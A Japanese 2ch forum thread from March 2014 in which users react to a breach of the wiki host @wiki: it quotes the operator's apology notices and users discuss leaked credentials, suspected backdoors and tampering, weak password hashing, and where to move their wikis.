この緊縛感がいやすぎる…
有限会社の管理なんて杜撰だからこんなもんよ
自分のメアドなかったら流出してないってことでいいんだよね?ね?
2005年からここ借りてるけどもさっきパスワード変更してきた
特になんの影響も無い
メール読んでパスの再発行したんだけどまずかったかな
まずいというより意味ないだけじゃね
もし本当に今も筒抜け状態なら当然パス変える意味はないし
さりとてパス変えなけりゃ安全かといえばそんなこともない
つってもスキルのないやつに悪戯される確率は下がるんじゃね?という点で完全に無意味でもないか
いつになったら開いていい状態になるの
いや、乗っ取られててパス変えるとホリエモンが出てるとかいう話が出てたから
罠踏んじゃったかなとかそこは心配して
www3だけどパス変更時、特に怪しい所はなかった
244 :
名無しさん@お腹いっぱい。:2014/03/10(月) 04:36:53.02
静かに暮らしたいんですがもうリカバリしか手は無いんでしょうかね…
リカバリしないといけないほど心乱れてるんならLANケーブル抜きっぱなしじゃないと駄目じゃないかね
ブラウザが他ドメインのJSや画像を引っ張って来れちゃうのがセキュリティリスクすぎて今回の騒動の発端に繋がったんじゃないのか
鯖26だったなぁ
やれやれだぜ
248 :
名無しさん@お腹いっぱい。:2014/03/10(月) 04:42:44.14
>>245 ネットで駄弁りたい、安心もしたい
両方やらなくちゃあいけない(ワガママ)のが「ゆとり」の辛い所だな…
ネットサーフィンに安全は常に無い
進展なしか
オンラインゲームのアップデートでHDD内のデータが破壊されたりするんだから、ネットに繋ぐ以上なにが起きてもおかしくない
xreaや@pageのほうにもバックドアツールおんなじの画しこまれているのかよ
しかも去年から
今更ながらatwiki流出を知って少し焦ってる
ここ最近開いたのはモンスターストライクのwikiだけどios6.1.3のiPhoneで出来る対策はありますか?
一応ルーター再起動とiPhone再起動させたけど効果なかったりする?
登録してたメアドがgooメール(しかも期限切れ)だった
もう使わないし放置してたものだけど削除ぐらいはしておけばよかった
アクセスした奴はもう手遅れだから今すぐ窓から投げ捨てろ
それとこのスレはatwikiを語る場だからお前の壊れた端末についてはスレ違いだぞ
iphone叩き割れば全て解決
とりあえず大丈夫くさいようだな
ありがとよ
>>254 このスレでは具体的なセキュリティ対策については普段扱ってなくて手に余る状態だから
専門版に行ったほうがいいとおもうよ。セキュリティ板とかiPhoneの板とか。
あとゲーム?のスレで、おかしいことがあった人がいたかどうか聞くとか。
もうやってたら蛇足だけども。
>>253 当初嫌儲にスレ立ったときにグーグル検索がどうのこうので、その検索結果にatwikiとともに並んでた
今も検索結果から2chとatwikiを除外する条件で検索すれば出てくるよ
大丈夫?大丈夫?って聞いてる人が結構いるけど放射能汚染と一緒で現状は誰にも大丈夫なんて太鼓判押せないだろ
安心感がほしいだけならいくらでも直ちには問題無いって言ってやるが
あば、ついうっかり自分のwiki開いちまった
次スレから@wiki関連のリンク外した方がいいんじゃね?
【お詫び】ユーザ情報流出に関するお知らせ
いつも@wikiをご利用頂きありがとうございます。
この度、ユーザ用の管理情報およびデータの流出が確認されました。
ご迷惑をおかけし、誠に申し訳ございません。
緊急的措置として全ユーザのパスワードを強制的にリセットさせて
頂いております。お手数ですが、パスワードの変更をお願いいたします。
パスワード変更の方法につきましては、以下の通りお願いいたします。
1,
http:// より強制的にパスワード再発行ください。
2,管理画面より再度ご自身でパスワード変更いただけますよう
お願いいたします。
なお、流出した個人情報およびセキュリティ上重大と考える範囲内は以下のとおりです。
※流出内容
ユーザ名
パスワード(暗号化されています)
メールアドレス
登録時のIP
※影響範囲
現在登録中のユーザ全員
パスワードは単一方向の暗号方式を用いておりますが、
暗号化されたパスワードから元のパスワードを推測し難い状況です。
ただ、特定のサイトで単一方向の暗号方式を元に戻すサービスもあると伺っております。
念のため、パスワードの再設定をお願いいたします。
なお、クレジット番号、住所、氏名につきましては
管理情報として登録されておりませんので、流出はございません。
お手数ですが、念のため、パスワードの変更お願いします。
【お詫び】ユーザ情報流出に関するお知らせ【第2報】
いつも@wikiをご利用頂きありがとうございます。
ユーザ用の管理情報およびデータの流出を確認したサーバは以下の通りです。
パスワードを再発行される場合は、異なるパスワードで登録いただけますよう
お願いいたします。@wikiでのパスワード再発行の手順は下部に記載いたします。
なお、@wikiにご登録のパスワードを他のシステムなどで使いまわしされている場合は、
他のシステムでも同様にパスワードを変更ください。
他のシステムでのパスワードの変更方法は各システムのサポートにご確認ください。
データの流出が確認したサーバ
www4.atwiki.jp www17.atwiki.jp www26.atwiki.jp www30.atwiki.jp
www36.atwiki.jp www37.atwiki.jp www38.atwiki.jp www39.atwiki.jp
www40.atwiki.jp www41.atwiki.jp www42.atwiki.jp www43.atwiki.jp
www44.atwiki.jp www45.atwiki.jp www46.atwiki.jp www47.atwiki.jp
www48.atwiki.jp www49.atwiki.jp www50.atwiki.jp www51.atwiki.jp
www52.atwiki.jp www53.atwiki.jp www54.atwiki.jp www55.atwiki.jp
www56.atwiki.jp www57.atwiki.jp www58.atwiki.jp
www.だけで反応する専ブラもあるんよ
【お詫び】ユーザ情報流出に関するお知らせ【第3報】
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
いつも@wikiをご利用頂きありがとうございます。
現在、ユーザ情報流出につきまして警察に相談を行いました。
今後につきましては、警察と相談の上、進めてまいります。
再掲となりますが、流出したパスワードにつきまして
単一方向の暗号方式を用いておりますが、
暗号化されたパスワードから元のパスワードを推測し難い状況です。
念のため、@wikiにご登録のパスワードを他のシステムなどで使いまわしされている場合は、
他のシステムでも同様にパスワードを変更ください。
他のシステムでのパスワードの変更方法は各システムのサポートにご確認ください。
@wikiのパスワード再発行の手順
1,
http://a より強制的にパスワード再発行ください。
2,管理画面より再度ご自身でパスワード変更いただけますよう
お願いいたします。
各wikiのメンバーのパスワードについて
各wikiのメンバーのパスワードの再発行や変更はできません。
お手数ですが、再度メンバー登録いただけますようお願いいたします。
管理者様におきましては、不要となる旧メンバーアカウントを削除と
新メンバーアカウントの承認をいただけますようお願いいたします。
ファイルの改ざんについて調査/対策を行っております。
現在のところ、弊社で把握している点は以下の通りです。
1.一部のサーバのwikiにおいて、リダイレクトするスクリプトを
仕組まれまれたことを確認致しております。
2.一部のサーバのwikiパスワード再発行ページにおいて、
ページの改ざんされたことを確認しております。
3.インターネットの一部のサイトでJavascriptの改ざんがされたという記述が
見受けられます。弊社で調査いたしましたが、現在のところ、
改ざんは確認されていません。
4.インターネットの一部のサイトで@wikiにウイルスが仕込まれたという記述が
見受けられます。弊社で調査をいたしましたが、現在のところ、
ウイルスやウイルスによる通信は確認しておりません。
5.インターネットの一部のサイトで@wikiへアクセスすると、
open2ch様へ攻撃するという記述が見受けられます。
open2ch様に確認いたしましたところ、
現地点で、@wiki経由で攻撃は無いとご返答いただきました。
本件につきましては多大なご迷惑をおかけし、まことに申し訳ございません。
重ねてお詫び申しあげます。
何か質問等ございましたら、サポートまでフォームからお問い合わせください。
━━━━━━━━━━━━━━━━━━
本メールは、@wikiにご登録のユーザ様全員にお送りしています。
受信を希望されない場合は退会が必要です。
移住先はどこがいいだろうね
>>2 昨日これやった後電源入れたら変な画面になったまま起動しないんだけど
ウィルスに感染した可能性あるって事かな?
>>275 >>2はパソコンの中身を空にする悪質な嘘コマンド(ウイルスも消えるから間違っちゃいないが)
ほんとにやったならwindows自体消えてるから、windowsのインストールからやり直し
このコマンドは再起動するまでOSは消えないんだっけか
移転先を探してるんだけど、FTPが使えるブログとかレンタルwikiって無いかな?
htmlの知識が全くないからホームページ系は出来る気がしないんだ…
勉強すりゃいいのに
小学生でも作れるぞ
もうatwikiは死んだの?
むしろ死んでないから問題になってる
284 :
名無しさん@お腹いっぱい。:2014/03/10(月) 07:48:34.97
>>185 マジですが、佳子様のエロ小説作者だと疑われていて相談ができません。
どうしたらいいですか?
本当に知らないでリンクしました。
警察にもガチ通報されています。
ここもじき腐海に沈む
まだ鯖落としてないことに驚きを隠せない
そらギリギリまでアフィで儲けたいからな
いくらアフィで儲けたってムショにブチ込まれたら意味ないだろ〜
いや、もう逃げた?
おっぴろげてたらレイプされた
↓
おっぴろげたまま警察に相談
↓
ずっと、おっぴろげたまま
レイプされても文句言えないでしょ?
こんな信頼落とすようなことしたらアフィなんか踏むやついなくなるよなあ
さっさと鯖落として謝罪しとけばまた違ったかもしれないのに
被害者側なんだから倒産はあってもムショはないだろうよ
嫌儲は逮捕カウントダウンだろうけど
>>288 ムショにぶちこまれようと罰金受けようと
それ以上の利益があればいいんじゃない?
そう思ってんならどうなるのか知らないけど
人の生き血をすすり♪ 吸われた(´・ω・`)
昨日散々言われたのにまだ落としてないの?てか落とす気無いだろ
どんだけ金の亡者だよ
アフィカスは人のことなんて考えない薄情な奴ばっかなんだな
なんかこの事件警察が臭いせいで逮捕者でない気がする
セキュリティ専門の会社に応急の対策と原因究明をやってもらうものなのに
それすらやってる気配がない
「wiki ハッキング 対策」 とかで血眼になってググってそうで怖い
>>289 言いたいことはくみ取るけども、
例えが論理的に間違ってて全く同意できない
>>291 掲示板運営者とかでも適切に管理してないと捕まるんだぞ
マジな人たちはキチンと対策とっているので間違いなく逮捕されない
逮捕されるのはなんJでお祭り騒ぎで鉄砲玉になった奴
つまり誰かが捕まってもハッキングは続くわけだ
管理者としてある程度対策はするけどお金ほちいから落としませ〜ん^p^
おまえらが個人情報流失して被害喰おうが確認してないウィルスブラクラ踏もうが知りませ〜ん^p^
懲役が5年でもそれまでに1億稼いで隠せれば年収2000万だとクロサギに書いてた
漫画の入り知恵(笑)
>>298 誰かが企業サイトに穴を開けて何か工作した
↑
ここまではハッキング事件として理解できるけど
その穴を見つけて、2chの一部ユーザーが皆でよってたかって犯罪行為に走った
↑
これが真実なら、本気で理解できない。
なんなの?皆、捕まりたいの?それとも、本気で何も考えてないの?捕まることすら知らない?
ハッキングできるまで技術勉強した人間でそんなバカがいるの?
不正アクセス禁止法とか知らないんじゃないの
住所晒しとか平気でやって大規模規制の引き金になってる連中だし
捕まりたいから犯罪するやつなんているか?
普通に考えて別な理由があるだろ
アフカスの私怨による挑発行為だろ
捕まりたいかどうかは知らん
捕まってもいいから犯罪する奴ならいる
動いてる奴の半分はそんな感じだし
307 :
名無しさん@お腹いっぱい。:2014/03/10(月) 08:48:36.59
>>294 俺がリンクして逮捕されるかもしれない。
秋篠宮佳子様のエロ小説作者だと思われているから、警察にとってはチャンス到来・・・orz
アフィカス× 嫌儲○
流出が確認されたサーバーにパズドラのが入ってないんだがどゆこと
>>309 流出と改竄は別件
改竄は全サーバーがヤバイ
311 :
名無しさん@お腹いっぱい。:2014/03/10(月) 08:51:19.74
警察に相談したってお知らせメールであったけどまず本当に警察に連絡したのかさえ怪しい
313 :
名無しさん@お腹いっぱい。:2014/03/10(月) 08:51:41.78
>>309 運営が確認できてないだけ
バックドアはすべての鯖に設置されてたからすべて漏洩した可能性がある
とりあいずfc2wikiに避難した、バックアップできないんでページを一つ一つコピペ
200ページくらいあったし、文法やCSSの仕様が微妙に違って苦労したけど
今のところタスクマネージャーでは変な通信してる様子もないし、スキャンしても何も出ないし大丈夫かな?
>>315 200ページも移動させたの?手動で?それはあかんやつですわ
(アカン)
たかが200でごちゃごちゃ
管理者権限のみ編集できるページでhtmlを書けるwikiってatwikiだけ?
いや、手動で200ページをコピペなんてマゾすぎるだろ
>>307 何をやったらそんな疑いをうけるんだよ…
そもそもそんな小説を本当に書いていないなら大丈夫だろ
原爆投下直後の放射能汚染みたいな場所によく行けるよなとは思う
>>321 ウィルスが仕掛けられていないかの確認も兼ねてだろうな
可能性は低いと思うけど自分もそうするわ。
マゾチキ
トロイ作成キットで亜種作り放題かぁ
早くカスペルスキー対応してくれー
朝になったが結局第4報もないのか
というか公式発表が本当に公式かすら疑わしい状況だしもう記者会見でも開けよ
@wikiで、編集だけした覚えがあるけど、
編集ってメンバー登録必要?
すんごい昔なのでメルアド登録したか覚えてないや
うぉ、手動でしかもただのコピペじゃなくて適合するように変えて200ページw
改変コードかいてもいいぐらい
>>328 編集のたびにCAPTCHA入力してたならセーフ
してないなら登録してたことになるからアウト!!!!
200個って人間がやる仕事じゃねえよなw
どう考えてもキカイにやらせるレベル
>>327 Q、ハッキング対策にサーバーを落とすとうの処置をなさらないのですか?
A、そのような事実は把握してません!
儲かるなら200ページなんぞ余裕アフィ
落としたら金入ってこないじゃん
見ただけでやばいの?
情報流出ってのはatpagesは関係ない?
>>328 wikiの設定による
でもどっちにせよメンバー登録だけなら(今のところは)大きな問題はないので大丈夫
移転させるかな
4つもあるから面倒だな・・・
入れ違いで見ただけでとかほざくやついるな
対策法書いてある過去レスすら探さない面倒くさがりか
atwikiだけでなくatwikiの会社関連は全部アウトじゃなかったか
>>336 googleニュースで「atwiki」で検索して、ニュースソースって所を開けば
「閲覧しないこと」を推奨って書いてる
アットフリークスの自己申告ベースのニュースサイトなんか信用できるかよ馬鹿
結局パスも変更しないで黙って退会が正解なんだろ
パス変更しちゃった
公式発表が穴だらけってのが混乱に拍車をかけてるな
>>330 うーん、覚えてないわ。でもメルアド登録か、
CAPTCHA入力かだったら後者だろうな。
>>337 2chまとめで、誰でも編集オッケーなwikiだったと思う。
発言がコピペされたんたけど、間違い情報なんで書き直した。
確認したいけど、踏めないからなあ。
>>346 履歴の件数があって、ログインも出来ないなら、見たところで分からんと思うよ
パスワード破棄されたんだからパス変更しないと退会できなくない?w
侵入方法・漏洩データが公開される
↓
自分でパスワードを変更した
↓
ログインできなくてパスワードをリセットした
↓
運営がパスワードを強制リセット
↓
ログインできなくてパスワードをリセットした←いまここ
覚えやすいパスワードに変更させてくれない
200変えたマンの自演賛美がうぜー
今回の状態で考えうる可能性のひとつとして
他サイトを攻撃するPHPプログラムがwikiページから読み込まれるようになっていた場合、
ページを読み込むだけで実行されるので、自分のPCに変化が無くても
知らず加害者として加担してしまうなんてこともおこりうるんだよね。(あったと確認された話ではないよ)
PHPだとソースをみてもブラウザには表示されないのでJavaScriptみたいに確認できない。
なので、見に行くことすらしないほうがいいだろうねって話が方々からでてる。
ブラウザからソースをみても表示されない、だった
200個のページを正確に編集して移行させましたとかさ、
単純作業のバイトの面接ではアピールできるだろうなw
よかったなw
編集のために登録したのか全然覚えてないんだけどそういう登録でもパス変更しろってメール届いてる?
登録者にはメール来てるって話ちらほら見たけど
>>351 それで犯罪予告とか実行されたらたまったもんじゃないな
管理者→パスワード強制リセット
編集者→管理者が古い編集者を削除して、新たな編集者として登録し直す必要がある
あくまで仮定。
atwikiのページに、犯人が悪質なスクリプトを書き加えたと仮定する。
そのスクリプトで犯行予告が行なわれて、
その悪質スクリプトを犯人が削除したら…
片棒君の事件もそうかもしれないしそうではないかもしれない
>>347 画面見ればどこの編集ボタン押したか、
それともパスワード入力してログインしたか思い出すかなと。
>>358 うんうん。
人の記憶なんて人それぞれだから自分が覚えてるかとか他人に聞くことではないな。
サーバーの.sqlが検索エンジンから表示されない・・・
>>360 そもそもSQLが検索対象になってたことあったか??
既に@wikiから他の無料wikiへ移転した所ってある?
閉鎖できないの?
内容はもうどうでもいいから閉鎖しちゃいたいんだけど
gooメールのやつは助かったな
無料版あと40分で終了するぞ
攻略とか小説とかその他もろもろなんて所詮全部自己満足だろ
ネット死んだら何も残らないんだしそこまでこだわる程のものか?
移転先はどこがいいんだ
常駐スレの管理人が改ざんの形跡ありませんし自分のPCにも異常はありません
流出したデータも登録し直したから大丈夫です
って言ってて怖い
ちゃんと教えといた方がいいんだろか
お前自身が、誰かに聞いただの書き込みを見たとかじゃあなく「ちゃんと分かってる」のなら教えてあげればいいんじゃね
何度も繰り返すが、www1〜www58のすべてにバックドアが仕掛けられていた
>>367 ここで尋ねる程度の脳味噌しかないなら辞めとけ
>>366 無料レンタルのものに「良い移転先」なんて無い。
危険性はどこでも一緒、五十歩百歩、
遅かれ早かれどこでも似たような事になると思って行動すべき。
有料レンタルには極力手を出さないでアフィで金稼ぎたいんだな
この糞サイトの漏洩のせいでメアド垢削除に会員登録のパス変更や退会とかクソ面倒くさいことやるはめになった死ねよマジで
まとめサイトで金儲けしてる人もいるのか・・・
以前やってみたが1円にもならなかったな
第4報まだかよ
金稼ぎ、やりやすさ、今更変えるの面倒、騒動終わっても使ってる俺かっこいい()
他に残る理由は?
377 :
名無しさん@お腹いっぱい。:2014/03/10(月) 11:04:21.41
>>362 とりあえず事態が落ち着いてから移転予定
他サイトのパスしか変えてないんだけどメアドも変えた方がいいの?
>>378 どれについて議論したいのかハッキリさせろ
・漏洩したメールアドレスとパスワードの組み合わせで他サイトにログインされる可能性
・他サイトの個人情報を盗まれる可能性
・勝手に注文される可能性
・クレカの下4桁を盗られる可能性
・さらに他のサイトの本人確認も突破される可能性
・漏洩したメールアドレスに迷惑メールを送りつけられる可能性
・漏洩したメールアドレスで他のサイトに勝手に登録される可能性
はい!
じゃあ今から元の状態に戻します!
3月4日時点のバックアップしかないんで3月4日の状態に戻ります!
とか言われても誰も納得しないでしょ?
それ以降の変更はどうすんの?
それ以前に不正な変更がなかったことは誰が保証するの?
軽く観覧してただけの人間だが、ガクブルが止まらん
スキャンでもしてろよ
踏む=感染ではないからな
ただいつめちゃくちゃになってもおかしくないから
危険って話
踏んだらトロイとかバックドア仕掛けられるらしいよ?
「仕掛けられるらしい」とか
atwiki運営の自己申告と同じくらいテキトーすぎる
でも完全に否定できないだよなぁ。
リスクはかなり低いと思うけど
これが@wiki商法?
392 :
名無しさん@お腹いっぱい。:2014/03/10(月) 12:07:28.53
@iwikゴメンネ…
泣きながら囁いてるようびみえるかも
退会してきたわ
394 :
名無しさん@お腹いっぱい。:2014/03/10(月) 12:26:18.25
>流出したパスワードにつきまして
>単一方向の暗号方式を用いておりますが、
>暗号化されたパスワードから元のパスワードを推測し難い状況です。
saltつかわない時点でこんなの辞書攻撃やらGPGPU解析使えば
すぐに割り出せるだろ
md5やsha-1程度なら、salt使ってもすぐに解析される
395 :
名無しさん@お腹いっぱい。:2014/03/10(月) 12:29:43.74
だからwikihouseにしとけとあれほど・・・・
396 :
名無しさん@お腹いっぱい。:2014/03/10(月) 12:29:45.89
アカウントはともかく
閲覧者なんか数かなりおるやろ
最低最悪なwikiだな
マジかよ屑すぎる
ゴミwiki
今北
けどなんら進展ないのかよ
403 :
名無しさん@お腹いっぱい。:2014/03/10(月) 12:37:03.79
>>403 @wiki独自の命令は使えないのか・・・イラネ
何度も言うけどwikiの閉鎖やatwikiからの退会をしても
何 も 解 決 し な い
からもう関わりたくないってんなら使ったメアド捨てて全部忘れろ
今回はだな、古い方の掲示板で昨年退会したのになんでデータ残ってんだよ?
退会した時点で抹消すべきだろ。消さないから今回漏れたんでしょーがー!
消せよこのファーザーファッカー!バカタレがっ!
こういうの普通は捨てアド使うんでねえの?
退会せずに残しておいて万が一改ざんされたり変なファイル置かれて、それで被害が出たら
wiki管理者が管理者責任を問われる可能性がある
なので、退会するのは意味が無いとは言えない
というかできれば退会して全部消してから、縁を切れ。
退会する=証拠隠滅でしかない
証拠隠滅は重罪である
@wiki利用者冷えてるか〜
国民センターは「サイバー警察へ電話しろ」と言う
サイバー警察は「サイトを閉鎖しなさい」と言う・・・解決になってない
日本の警察はコンピューター犯罪には弱いと痛感したわ
「誹謗中傷とかあれば検挙できる」
じゃ今は?
「動けません」
人が死んでからじゃないと動かないって・・・風林火山じゃないんだからさぁ・・・
413 :
名無しさん@お腹いっぱい。:2014/03/10(月) 13:02:49.07
>>364 おう、そうか。
俺はそれで登録してたわw
414 :
名無しさん@お腹いっぱい。:2014/03/10(月) 13:08:46.21
gooメールとライブドアの無料で登録してたから洩れてもいいやw
ブラウザのセキュリティホール突かれなければ見ただけで何かされるってことはないと思うが
ハッカー冤罪に巻き込まれるってのがあったか
416 :
名無しさん@お腹いっぱい。:2014/03/10(月) 13:21:36.23
その進展あった?
放置プレイ中
418 :
名無しさん@お腹いっぱい。:2014/03/10(月) 13:28:45.79
パスワードにハッシュつかっただけで安全とか、
@wikiの中の人のセキュリティーはザルすぎるな
saltつかわないハッシュなんて、平文で保存してるのとほとんどかわらない
>>419 でも掲示板やブログを放置して、それを勝手に悪用されて捕まった事例があるんや
ワイドショーでも取り上げられないなぜ?
>>420 今回の場合、それで責任を問われるのは@wikiじゃね?
一般人はwikiのことなんて知らんからなぁ。
説明が難しいだろ
MtGoxみたいに仮想通貨に手を出したものの末路みたいに
扇情的に煽れる放送なら簡単だけどさ
日本のマスコミは頭悪いから
ミヤネ屋でやるかなあ?
パズドラwikiなんて一般人でも開いた可能性ある人おおいだろうし
知らぬが仏では済まない事になりかねないと思うんだけど
もしかしてwww1.atwikiの更新情報を見るのもやばいの?
こんなローカルな話題をTVがやるわけがない
そもそもカード情報が漏れたわけでもないし
パズドラ自体の営業妨害になりかねん報道はさすがにせんだろ
結局どの程度の危険性があるのかハッキリせんし
ワイドショーw
バカかw
そうは言うけど、S村G内氏の会見よりよっぽど危険性あるし
影響を受ける人口もおおいよ
>>425 お前、馬鹿だなw
芸能人のメルアドでも見つけたのか?w
ワイドショーは公正な情報でなく娯楽性を提供するもんだぞ何いってんだ
433 :
名無しさん@お腹いっぱい。:2014/03/10(月) 13:54:33.36
バックドアでぐぐったらクレカ番号流出・勝手に買い物される恐れとか、もうね
去年のビューアー流出事件の時に変えたばっかなのに
仮にリカバリしたとして、サルベージしたデータを入れ直すときにまた感染する恐れアリって
ネットバンキング使用での番号流出とかもあるのかな
心配したら切りがないとは言え、自分の情弱っぷりが恐ろしいわ
ネット実名制とかの声が挙がるようになるんかね
>>430 TVは視聴率が全てということになってる
佐村碁打関連は数字が高いんだろうね
このスレのおバカレスはどこまでが本気でどこまでがネタなんだ
ワイドショー(笑)なんかに取り上げて貰うとか夢見るくらいなら
運営会社の取引先銀行に(素人でも分かるように分かりやすく)現在の状況をちくったほうがいい
>>426 そらそうよ
お知らせメールも生きてる垢探す為のpingだと思ってる
運営からの続報がウンともスンともピーともピーッピッとも言わねえええ!
仕事しろよマジで。
半年前の漏洩で反省しなかった運営に言ってもどうにもならん
外圧を使うしかない
メール自体が来ないよ
ベクターのときもそうだったが適当な運営者が多いな
ゴミアフィブログ見てるようなお祭り騒ぎのお客さんまで来たのか
昨日から沢山きてるよアホどもが
wikiに変なもん埋め込まれるの自体は別に今に始まったことじゃないだろうに
漏洩とクソ対応はマジ氏ねだけど
>>441 迷惑メールに入ってないか? 俺迷惑メールに分類されててしばらく気づかなかった
問題は乗っ取られた状態だと埋め込まれても対処できないということだ
だから鯖はやく落とせよ
今まで鯖を落とす対応を取るのか否か何も発表すらないんだからのうのうと運営続ける気じゃない?
ガンブラーみたいなやつかなこれ
>>444 atwikiの運営しか弄れない部分まで改竄されるなんて前代未聞だと思うんだが
ユーザー情報の漏洩だけならそこだけリセットすれば済む話だけど、今回はそんな問題じゃないぞ
cssがいじれるwikiって他にどっかある?
引っ越し先はどうする?
seesaaとfc2のwikiが候補になると思うが。
俺はlivedoor時代のseesaa wiki使っていたけど、やたら重くて@wikiに引っ越したんだ。
@wikiはjavascriptが使えたり高機能で嬉しかったな。セキュリティ的にはよくないんだろうけど。
またseesaaに戻るかfc2を始めるか・・・
それともwiki自体やめようかな?
これ裏でなんJ民が糸引いてるって本当?
パスワードが流出したぐらいでwiki辞奴wwwwww
少なくとも@wikiで続けようってやつはいねぇな
居たら馬鹿だ
>>453 パスワードが流出しただけじゃないんだよなぁ……
パスワードが流出しただけならよかったんだけどな
いやよくないけど
誰がどこのWikiを運営してたのかバレたっていうのは人によっては人生終了レベル
あるある
完全に紐付けられてしまったわorz
今北産業 噂が多すぎて状況がわからん
自分はメアド&パスワード&wikiの中身がどうでもいいから放置してる
でもwikiが不正スクリプトの温床になってる可能性があると考えると
無視もなー・・
さっきパズドラwiki見ちゃったけどどうしたらいいの…(´;ω;`)
わぁい、知らない番号から電話かかってきたぞ\(^o^)/
465 :
名無しさん@お腹いっぱい。:2014/03/10(月) 15:22:52.11
公安9課がこい
代わりに公安仇課が来ます
公式はなんか言えよ
金稼ぎに必死な肥えたお偉いさんはどこも無言が得意技なんだな
ネクソンとかガンホーの運営より酷い
そもそも比べることがおこがましいだろ
その二社だっていろんな意味が有るとは言え実績の有る株式会社だし
>2.一部のサーバのwikiパスワード再発行ページにおいて、
>ページの改ざんされたことを確認しております。現地点で改ざんされたと
>把握できたページにつきましては、対応を完了いたしております。
@wikiパスワード再発行のページ
[登録サーバを選択してください。]をクリック
→選択肢がwww200まで列挙される
ブラウザからFTP利用のページ
[www1.atwiki.jp]をクリック
→選択肢がwww199まで列挙される
>>471 そしてパスワード再発行ページに現れる謎の人物
うーん一体どこに移ればいいのか
CSSいじれる→FC2wikiか?
wiki内でお絵描き掲示板を設置できる→一応wikiwikiにpaintプラグインあった
htmlを記述できるプラグインがある→ない?
ツイッターウィジェット使える→wikiwikiかな?
更新情報をツイッターに出力→ないので、外部のwebサービス使ってRSSから
自動的に吐き出してもらう?か?
もっと色々あるけど・・・・うーん、微妙だ
474 :
名無しさん@お腹いっぱい。:2014/03/10(月) 16:07:49.16
まさかのサイト自作復古とか
FC2一択
もし@wikiがこれから撤退することに決まった時、
wiki作成ソースをまるっと提供してくれたら神対応と言える
479 :
名無しさん@お腹いっぱい。:2014/03/10(月) 16:13:48.98
善意でよそに移植してくれても、まるごとコピーしてたら、ヤヴァイのを拡散してるだけっていう
編集メニューでテキストだけメモ帳にコピーして書式はリセットして新ページに入れたら大丈夫だろう
画像は駄目だね
ページが多いwikiもこの方法じゃ時間が掛かりすぎる
>>459 【はっきりしていること】
・全管理者・登録メンバーのメアドおよびパスワードのハッシュ流出
ハッシュはごく簡単なものなので生パスが全部割れたのとほぼ同意
・少なくとも半年以上前からatwikiのサーバが外部から侵入可能な状態にあり、
サーバに自由にアクセス可能なバックドアが仕掛けられていた
【はっきりしていないがそうであっても何の不思議もないこと】
・流出したメアドとパスを使って愉快犯があちこちのwikiを改竄していた
(閲覧者や他のサイトなどへの攻撃に相当するものを含む)
・上記の侵入経路がまだちゃんと対策されずに残っている
【あまり根拠のないこと】
・今もなお愉快犯による改竄が続いている
・atwikiを見るだけでPCにウィルスに感染したり踏み台にされたりする
・管理者は今すぐ退会しないと何らかの責任を問われる
>>482 【はっきりしていること】
・ユーザーには編集できないパスワード再発行画面が何者かに改ざんされていた
・
>>471で指摘されている部分は未だに改ざんされたまま
も追加で
俺が悪いことを考えるとすれば、バックアップのダウンロードするとこに悪質なウイルスを仕込むわ。
だからバックアップもダウンロードしたくない。
>>482 一番下のは
【可能性があること】
でしょ
486 :
名無しさん@お腹いっぱい。:2014/03/10(月) 16:30:56.98
さっきゴッドイーター2のアットウィキ踏んだからちょいノートン先生に調べてもらうわ
>>482 はっきりしていること
(2) 1年前=去年の2月から
>>471 運営自身が変更したということはないのかね?
【可能性があること】
・今もなお愉快犯による改竄が続いている
・atwikiを見るだけでPCにウィルスに感染したり踏み台にされたりする
【あまり根拠のないこと】
・管理者は今すぐ退会しないと何らかの責任を問われる
このくらいでいいんじゃない
451だけど以前使っていたlivedoor wikiまだあったw
seesaaになっていたが
CSSのカスタマイズもできるみたいだ
とりあえず出戻りするわ
それでは達者でな〜
490 :
名無しさん@お腹いっぱい。:2014/03/10(月) 16:33:09.98
>>481 汚染ソースをそのまま他所にもってたらダメじゃん。
>>482 【あまり根拠のないこと】は、【はっきりしていないがそうであっても何の不思議もないこと】に含まれるだろう。
>>485 責任って何の?
今さら逃げて何か意味あんの?
結局関連があるのではと疑いかかってたアンサイクロペディアはドメインの更新忘れだった事が判明
3月8日で凍結してる模様
>>491 起こり得るのは管理者責任を問われることだね
今更逃げて意味あんの?っていうか、
自分のサイトが改ざんされる前に閉鎖した方がいいっていう話
FC2は便利そうだが何か怪しいから使いたく無いんだよなぁ
今回漏洩したSQLダンプファイルに、
・管理者編集者のgo.jpやac.jpやco.jpのメールアドレスが含まれる
・編集履歴に編集者のIPアドレスや日時が記録されている
↓
つまり、
勤務時間中にウィキを編集した輩を抽出できる!!
>>487 存在しないサーバーの番号をハックが判明した後に運営自身が載せる意味は…?
>>497 ハクられたのはごく一部の鯖です(白目)
と情弱に言い訳するための前振り
>>497 「弊社で調査チームを結成し漏洩事象の詳細を調査しましたが、
改竄されていた箇所は「登録サーバ」選択画面1箇所のみであることが判明しました」
とか言うための伏線である可能性が
相手はポイントを0にしてポイント購入させるのが目的だろう
(ポイント減らないサイトも多い)
相手が嫌がることなら何でもしてみればいい
しつこく返信して相手の時間を奪うことだ
ただしあまりに酷い返信をすると退会処分になってチェックメイトだ
観覧しかしてないんだが、観覧先のwikiが改竄されてたりしたから、調べたら該当してたんだが
PCのウイルススキャン(カペルスキー)に引っ掛からなければ、大丈夫なのかな?
踏み台とか怖いんですけど…
心配なら初期化するしかないのかな?
とりあえず@wikiへのリンクを斬って様子見しとく
ウイルススキャンにひっかからないウイルスがいるかもしれないし
いないかもしれない
ヒント:誤検知
507 :
名無しさん@お腹いっぱい。:2014/03/10(月) 17:15:30.46
>>501 504と一緒で今は情報が錯乱してるし可能性はたくさん。
とりあえずスキャンしとけばいいよ
サーバー名がwww200までに変更されていたが、
これが意図的な変更か不正な変更か
ウイルス対策ソフトが自動的に判定できるとか思ってるの?
おめでたいやつだな
ソフトはそういう無知な客相手への商売なんだから仕方ないよ
>>482 >【あまり根拠のないこと】
>・今もなお愉快犯による改竄が続いている
某所ではこんなことが書かれてるで
>さて、静かになった所で
>@pagesのほうにも手を付けていきたいです+ナリ
書かれているから何なんだろう
512 :
459:2014/03/10(月) 17:27:50.48
>>482,483,485,487,488
情報thx
閉鎖に越したことはないってことか 閉鎖用の公式ページはまだ大丈夫なのか?
ウィルス対策ソフト期限切れなんだよな・・対策してから行くわ
513 :
名無しさん@お腹いっぱい。:2014/03/10(月) 17:30:09.16
結局ウイルスはなし??
514 :
名無しさん@お腹いっぱい。:2014/03/10(月) 17:31:02.96
@pagesってホームページの方か
